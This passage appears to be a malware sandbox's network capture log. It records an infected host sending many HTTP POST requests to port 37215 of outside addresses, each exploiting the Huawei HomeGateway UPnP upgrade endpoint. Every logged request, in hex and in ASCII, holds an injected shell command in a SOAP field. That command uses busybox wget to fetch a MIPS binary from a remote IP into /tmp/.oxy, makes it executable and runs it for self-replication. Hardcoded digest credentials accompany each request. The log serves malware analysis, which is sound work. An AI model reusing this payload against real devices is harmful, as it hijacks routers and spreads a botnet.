20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2269192.168.2.1560440138.139.255.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.325819969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2270192.168.2.1549532102.216.172.11637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.326175928 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2271192.168.2.154132441.174.235.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.326206923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2272192.168.2.1556458197.134.144.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.326235056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2273192.168.2.153300686.122.239.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.158349991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2274192.168.2.1546472197.0.16.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.158350945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2275192.168.2.153769241.222.154.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.158390999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2276192.168.2.1540432171.77.24.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.158420086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2277192.168.2.155187840.203.254.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.158420086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2278192.168.2.154605241.195.133.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.322176933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2279192.168.2.155538041.27.47.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.322190046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
